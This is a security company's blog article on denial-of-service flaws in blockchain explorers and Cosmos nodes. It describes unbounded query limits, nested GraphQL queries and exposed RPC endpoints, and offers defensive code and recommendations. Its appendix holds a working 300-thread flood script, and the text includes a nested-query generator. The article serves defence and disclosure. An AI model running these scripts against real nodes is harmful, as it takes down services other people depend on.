
Is Your Blockchain Explorer Safe from Denial-of-Service (DoS) Attacks?

7/28/2020


Introduction

Blockchain explorers are blockchain search engines that allow you to search for a particular piece of information on the blockchain. For example, Etherscan (https://etherscan.io/) is a blockchain explorer for Ethereum, providing users easy access to information about blocks, addresses, transactions, and other activities on the Ethereum blockchain.

The attack surface of a blockchain explorer application is relatively small. Since explorers don’t involve authentication or authorization, there is no private information to leak. Additionally, the widespread use of web frameworks such as Vue and React makes XSS (Cross-Site Scripting) less likely.

Most explorer features involve searching a backend database or querying blockchain nodes directly. When it comes to vulnerabilities in search queries, two come to mind: SQL injection and DoS (Denial-of-Service). Among the explorers we examined, we found only one case of SQL injection. By contrast, more than half were vulnerable to DoS attacks.

Denial of Service (DoS) is an attack that prevents a system from providing services to legitimate users. Application-layer DoS attacks exploit the fact that HTTP requests are cheap for clients to send but can be expensive for the server to process. Generally speaking, DoS attack and defense is an arms race, and the outcome depends on which side has more resources. However, if the backend is poorly implemented, it’s possible to bring down an application with just one request.

In this article, we’ll cover three things. First, we discuss some oversights that developers commonly make that can leave an application vulnerable to DoS attacks. Second, we describe the impact of such attacks. Finally, we offer recommendations for protecting the application.

Examples of DoS Attacks

There are many ways to DoS a server, but the goal is generally to exhaust either CPU and memory resources or all available connection slots. We present some unique cases that make servers vulnerable to DoS attacks. Some are caused by software implementation errors and others by misconfiguration:

1. Resource access API without limitation

https://fake.sample.com/api/v1/blocks?limit=10

The request above fetches information for the number of most recent blocks given in the “limit” parameter. With the limit set to 10, it returns information for the last 10 blocks. The request works perfectly when the number is small. However, we found that the backend might not enforce an upper bound on the “limit” parameter. When we sent the request with “limit” set to 9999999, it hung for a long time and then returned a “504 Gateway Time-out” error. Meanwhile, the response time of other APIs increased significantly.

9999999 also exceeds the total number of blocks in the chain, so we suspect the backend attempts to fetch data for every block in the blockchain. If an attacker sent multiple requests with a very large “limit”, the server could crash or at least become unresponsive.

2. Nested graphQL query

We encountered a few blockchain explorers using GraphQL, a query language for APIs. With GraphQL, a client can fetch all the information it needs in a single call. Without it, the client would have to construct several REST requests. GraphQL is an amazing technology that many companies are starting to adopt, but it can cause security issues if not used correctly.

In one explorer, we found a GraphQL API with a circular relationship between two types. This allows a user to construct a query nested many levels deep. Sending such a query can drive up CPU usage on the server. With only a few requests, CPU usage can exceed 100%, leaving the server unresponsive to normal user requests.

% CPU while the server processes a nested GraphQL query

The “dos_query” below demonstrates what a nested query looks like.

Nested GraphQL Query
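The original “dos_query” appears only as an image, so here is an illustration of its general shape. The following Python sketch builds a query of the same kind. It assumes a hypothetical schema in which a block has a `transactions` field and each transaction has a `block` field pointing back to its block. The field names, the `block(height: 1)` entry point, and the `hash` leaf field are all assumptions, not the explorer’s real schema.

```python
def build_nested_query(depth: int) -> str:
    """Build a nested query for a hypothetical schema with the circular pair
    Block.transactions -> [Transaction] and Transaction.block -> Block."""
    fields = ["transactions", "block"]  # hypothetical circular field pair
    inner = "hash"  # a scalar leaf field so the query is syntactically complete
    # Wrap from the innermost level outwards, alternating the two fields.
    for level in reversed(range(depth)):
        inner = f"{fields[level % 2]} {{ {inner} }}"
    return f"query dos_query {{ block(height: 1) {{ {inner} }} }}"


print(build_nested_query(2))
# query dos_query { block(height: 1) { transactions { block { hash } } } }
```

The query text grows only linearly with `depth`. With naive resolvers, however, the work can grow much faster. Every block expands into all of its transactions, and every transaction resolves its block again.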

Depending on the complexity of the query and the server’s total CPU power, the server may survive the nested query. Alternatively, it may crash completely due to excessive CPU usage.

Check out this article for more information on handling malicious GraphQL queries.

3. Exposed Cosmos RPC APIs

https://fake.cosmos.api.com/txs?message.action=send&limit=100&tx.minheight=1

The Cosmos API request above searches for 100 transactions with the “send” action, starting from block 1. At the time of writing, the Cosmos mainnet had 2712445 blocks. We examined fully synchronized Cosmos Hub nodes that expose the RPC API, and none of them could handle this request. The server returned a “502 Bad Gateway” error after a while, indicating that the request had failed.

Once the node’s RPC server receives a couple hundred of these search requests within a few seconds, it returns errors for all APIs. Some nodes recover automatically, while others need a reboot.

To better understand the issue and demonstrate its effect, we set up a fully synchronized Cosmos full node. We then attacked it with the query mentioned above, “https://fake.cosmos.api.com/txs?message.action=send&limit=100&tx.minheight=1”.

Here is the CPU usage percentage panel, generated in Grafana:

Grafana CPU% panel

The graph can be broken down into 3 stages:

The node is up and running; CPU usage is at 35%.
The node is under a DoS attack; CPU usage rises to 97%.
The node crashes and can no longer feed new data to Grafana.

The graph shows the server crashing within just a few minutes of the DoS attack. After the crash we could not even connect over SSH, so we had to reboot the server.

4. Defective request handler

https://fake.sample.com/api/v1?feature=Always_time_out

We encountered one API that hangs and eventually times out. However, sending multiple requests to it did not slow down the response time of other APIs. Our guess is that the handler for that particular API is not CPU or memory intensive. Because the explorer is not open source, we could not inspect how the API is implemented. We also could not determine the endpoint’s purpose from its name.

Although attacking this API is unlikely to crash the server, an attacker can still stop other users from accessing the server’s APIs. To do so, the attacker sends enough of these hang-and-time-out requests to occupy all network connections.

For example, the “sleep_to_handle_request” function below shows how a request can consume very little CPU and memory yet hang for a long time, occupying a connection slot.

from time import sleep

def sleep_to_handle_request():
    sleep(10000)  # almost no CPU or memory, but holds the connection for 10,000 seconds

In the other three examples, the server crashed completely or took a long time to recover. In this example, by contrast, the server recovered right after the attack stopped.
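The connection-slot effect can be simulated with Python’s standard `concurrent.futures.ThreadPoolExecutor`. This sketch assumes a hypothetical server with only two worker slots. The handler names are illustrative, and a `threading.Event` stands in for the long sleep so the demo finishes quickly.

```python
import threading
import time
from concurrent.futures import ThreadPoolExecutor

# Hypothetical server with only two worker slots.
pool = ThreadPoolExecutor(max_workers=2)
attack_over = threading.Event()


def hanging_handler():
    # Like sleep_to_handle_request: no real CPU or memory use,
    # but the worker slot stays busy until the "attack" ends.
    attack_over.wait()
    return "timed out"


def normal_handler():
    return "ok"


# The attacker occupies every slot with hanging requests...
hanging = [pool.submit(hanging_handler) for _ in range(2)]
# ...so a legitimate request is queued behind them.
legit = pool.submit(normal_handler)
time.sleep(0.2)
served_during_attack = legit.done()
print("served during attack:", served_during_attack)  # False

# When the attack stops and the hanging requests finish, service resumes.
attack_over.set()
print("after attack:", legit.result(timeout=5))  # ok
pool.shutdown()
```

The legitimate request is never rejected. It simply waits for a free slot, which is consistent with the server recovering as soon as the attack stopped.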

Impact of DoS Attacks

Under a DoS attack, vulnerable servers fail to respond to normal user requests. Some servers return to normal, either immediately or some time after the attack stops. Others crash completely and need a reboot.

It would be a headache for any blockchain if its explorer became unavailable, since users could no longer easily obtain information about on-chain activity. Cosmos-based chains face an additional problem when a node suffers a DoS attack. The connected explorer can no longer fetch data from the node. In addition, users cannot use the node’s API to perform actions such as sending tokens or delegating tokens to validators.

Recommendations

Denial of Service attacks are always a threat to applications, and there isn’t a single perfect solution to mitigate them. However, some methods raise the cost of an attack, making it harder for would-be attackers to carry out. They also decrease the risk of vulnerabilities in explorer applications. Here are a few things that can be done to minimize the chance of an application falling victim to attackers:

1. Rate limiting

First things first: APIs should always have rate limiting in place to temporarily throttle and permanently block malicious IPs. Even if the backend APIs are perfectly implemented, an attacker can cause damage by flooding the server with a high volume of requests.

Rate limiting won’t solve the problem completely, but it’s easy to implement and provides the first layer of defense against a denial-of-service attack.
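Here is a minimal sketch of the idea, assuming an in-process Python service. The limiter below combines two mechanisms:

- a token bucket per client IP, for temporary throttling (one common algorithm among several, chosen here for illustration);
- a blocklist, for permanent bans.

The class name, parameters, and example IPs are hypothetical. In production, rate limiting is often enforced at a reverse proxy or backed by a shared store so that it applies across server instances.

```python
import time


class RateLimiter:
    """Per-IP token bucket plus a permanent blocklist.

    Each IP may burst up to `capacity` requests, then earns `rate` new
    requests per second. IPs in `blocked` are always rejected.
    """

    def __init__(self, rate: float, capacity: int, clock=time.monotonic):
        self.rate = rate
        self.capacity = capacity
        self.clock = clock    # injectable so the behavior can be tested
        self.buckets = {}     # ip -> (tokens, time of last check); grows per IP
        self.blocked = set()  # IPs banned permanently

    def allow(self, ip: str) -> bool:
        if ip in self.blocked:
            return False
        now = self.clock()
        tokens, last = self.buckets.get(ip, (float(self.capacity), now))
        # Refill for the time elapsed since the last check, capped at capacity.
        tokens = min(self.capacity, tokens + (now - last) * self.rate)
        allowed = tokens >= 1
        if allowed:
            tokens -= 1
        self.buckets[ip] = (tokens, now)
        return allowed


# Usage with a fake clock: a burst of 3 is allowed, then requests are throttled.
fake_now = [0.0]
limiter = RateLimiter(rate=1.0, capacity=3, clock=lambda: fake_now[0])
print([limiter.allow("203.0.113.7") for _ in range(5)])  # [True, True, True, False, False]
fake_now[0] = 2.0  # two seconds later
print(limiter.allow("203.0.113.7"))  # True (tokens refilled)
limiter.blocked.add("198.51.100.9")
print(limiter.allow("198.51.100.9"))  # False (blocklisted)
```

The `buckets` map gains an entry for every distinct IP. A real deployment would therefore also need to expire idle entries; otherwise the limiter itself becomes a memory target.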

2. Improve design and implementation

An optimized design and implementation yields better performance on the same hardware, especially for functions involving database searches and data processing. But before considering performance, the code needs to be bug-free.

It’s worth writing unit tests for each API to ensure it works as intended before deploying to production. If the backend server can’t properly handle a normal request, expect the application to run into trouble eventually.

3. Input validation and parameter restrictions

Once you’re sure the code works as intended, you also need to ensure that attackers cannot abuse the API with unexpected input. A server should not process requests such as fetching data for 9999999 blocks or handling a 1000-level nested GraphQL query.

Without input validation and restrictions, attackers are free to abuse APIs. All user input should be treated as untrusted and potentially malicious, and servers should validate it before processing.

For the examples above, GraphQL APIs can set a maximum query depth to defend effectively against DoS attacks that use nested queries. Likewise, the block-fetching API can cap the number of blocks at a reasonable value, such as 50.
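Here is a minimal sketch of both restrictions in Python. It assumes the “limit” parameter arrives in the URL query string, as in the earlier example request. The 50-block cap comes from the text. The default of 10 blocks, the depth limit of 10, and all function names are hypothetical.

The depth check is deliberately naive: it counts braces, ignoring braces inside strings and not expanding fragments. A real GraphQL server should instead rely on its library’s validation or a depth-limiting extension.

```python
from urllib.parse import parse_qs, urlparse

MAX_BLOCKS = 50       # upper bound suggested in the text
DEFAULT_BLOCKS = 10   # hypothetical default when "limit" is omitted
MAX_QUERY_DEPTH = 10  # hypothetical GraphQL depth limit


def parse_block_limit(url: str) -> int:
    """Validate and clamp the "limit" parameter of a blocks request."""
    values = parse_qs(urlparse(url).query).get("limit")
    if not values:
        return DEFAULT_BLOCKS
    try:
        limit = int(values[0])
    except ValueError:
        raise ValueError("limit must be an integer") from None
    if limit < 1:
        raise ValueError("limit must be positive")
    # Clamp instead of trusting the client: 9999999 becomes MAX_BLOCKS.
    return min(limit, MAX_BLOCKS)


def graphql_depth(query: str) -> int:
    """Naive selection-set depth: the maximum nesting of curly braces."""
    depth = max_depth = 0
    for ch in query:
        if ch == "{":
            depth += 1
            max_depth = max(max_depth, depth)
        elif ch == "}":
            depth -= 1
    return max_depth


def check_query_depth(query: str) -> None:
    """Reject the query before execution if it is nested too deeply."""
    if graphql_depth(query) > MAX_QUERY_DEPTH:
        raise ValueError("query is nested too deeply")


print(parse_block_limit("https://fake.sample.com/api/v1/blocks?limit=9999999"))  # 50
print(graphql_depth("query { block { hash } }"))  # 2
```

Clamping oversized values keeps existing clients working. Rejecting them with an error is an equally valid choice and makes abuse more visible in the logs.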

Developers should examine their own code and design to find the most appropriate way to validate input and enforce restrictions.

4. Don’t expose the node RPC

Not all API implementations are under a developer’s control. For example, developers shouldn’t modify the code of the Cosmos RPC APIs. It’s also a known issue that certain search queries in the Cosmos SDK perform poorly. So what can we do here?

One solution is to put a wrapper API in front of the Cosmos RPC API. The wrapper is backed by a database that stores blockchain data synchronized from the node, and that database serves search queries. The wrapper API is exposed to the public to receive and process user requests. It then either passes each request on to the Cosmos RPC or searches the backend database. This setup has three benefits:

- Users cannot interact with the node RPC APIs directly.
- The database keeps search queries from overwhelming the node.
- Developers can optimize the database however they want.
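Here is a minimal sketch of the search side of such a wrapper. It assumes a hypothetical `txs` table that a separate sync job fills from the node. The schema, function names, and 100-result cap are all illustrative, and Python’s built-in `sqlite3` stands in for whatever database a real explorer would use.

```python
import sqlite3

MAX_RESULTS = 100  # hypothetical cap on search results


def open_index() -> sqlite3.Connection:
    """Hypothetical local index that a sync job fills from the node."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE txs (hash TEXT PRIMARY KEY, height INTEGER, action TEXT)")
    # An index on (action, height) lets searches avoid scanning every row.
    conn.execute("CREATE INDEX idx_action_height ON txs (action, height)")
    return conn


def sync_tx(conn: sqlite3.Connection, tx_hash: str, height: int, action: str) -> None:
    """Called by the (hypothetical) sync job for each transaction read from the node."""
    conn.execute("INSERT OR IGNORE INTO txs VALUES (?, ?, ?)", (tx_hash, height, action))


def search_txs(conn: sqlite3.Connection, action: str, min_height: int, limit: int) -> list:
    """Public wrapper endpoint: searches the database, never the node RPC."""
    limit = max(1, min(limit, MAX_RESULTS))
    rows = conn.execute(
        "SELECT hash FROM txs WHERE action = ? AND height >= ? ORDER BY height LIMIT ?",
        (action, min_height, limit),
    )
    return [row[0] for row in rows]


conn = open_index()
sync_tx(conn, "A1", 5, "send")
sync_tx(conn, "B2", 7, "delegate")
sync_tx(conn, "C3", 9, "send")
print(search_txs(conn, "send", 1, 100))  # ['A1', 'C3']
```

With this design, a burst of `message.action=send&tx.minheight=1` style searches hits the indexed table rather than the node. The parameterized queries also avoid the SQL injection risk mentioned earlier.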

On the Cosmos forum, user “kwunyeung” suggests another solution: use an HTTP proxy such as Nginx or Caddy to protect the RPC port. The idea is the same—don’t expose the RPC directly to the public, and put certain protections in place.

5. Meet the recommended hardware requirements

Even with all of the above defenses deployed, note that running an API server or a stable node (Tendermint, for example) has minimum hardware requirements. If the server struggles to handle requests from regular users visiting the website, you should probably upgrade your hardware.

In Summary

The last thing that users want is a service interruption, and DoS attacks may put applications like explorers at risk.

If you’re looking to conduct a thorough review on the security posture of your blockchain ecosystem—including the explorer, wallet, exchange, smart contract, or even the implementation of your underlying blockchain protocol—CertiK can help.

Our team has a wide range of blockchain experience and expertise in application vulnerability assessment. We also review code in languages like Solidity, Rust, and Go, on platforms like Ethereum, Cosmos, and Substrate.

Appendix

Denial of Service testing script.

This sample script tests whether Cosmos nodes are vulnerable to the denial-of-service attack described above. Modify the “url” variable accordingly to test different applications.

Please do not run it against applications you don’t have permission to test.

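import threading

import requests
import urllib3

# verify=False is used below for nodes with self-signed certificates; silence the warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Modify the url
url = "https://fake.cosmos.api/txs?message.action=send&limit=100&tx.minheight=1"


def dos_thread():
    # Send the expensive search request in an endless loop
    while True:
        try:
            # Arbitrary timeout; without one, a hung request blocks the thread forever
            response = requests.get(url, verify=False, timeout=120)
            print(response.status_code, response.text[:200])
        except requests.RequestException as exc:
            # Timeouts and connection errors are expected once the node degrades;
            # catching them keeps the thread alive instead of letting it die
            print("request failed:", exc)


if __name__ == "__main__":
    # 300 concurrent threads, each looping on the search request
    for _ in range(300):
        t = threading.Thread(target=dos_thread)
        t.start()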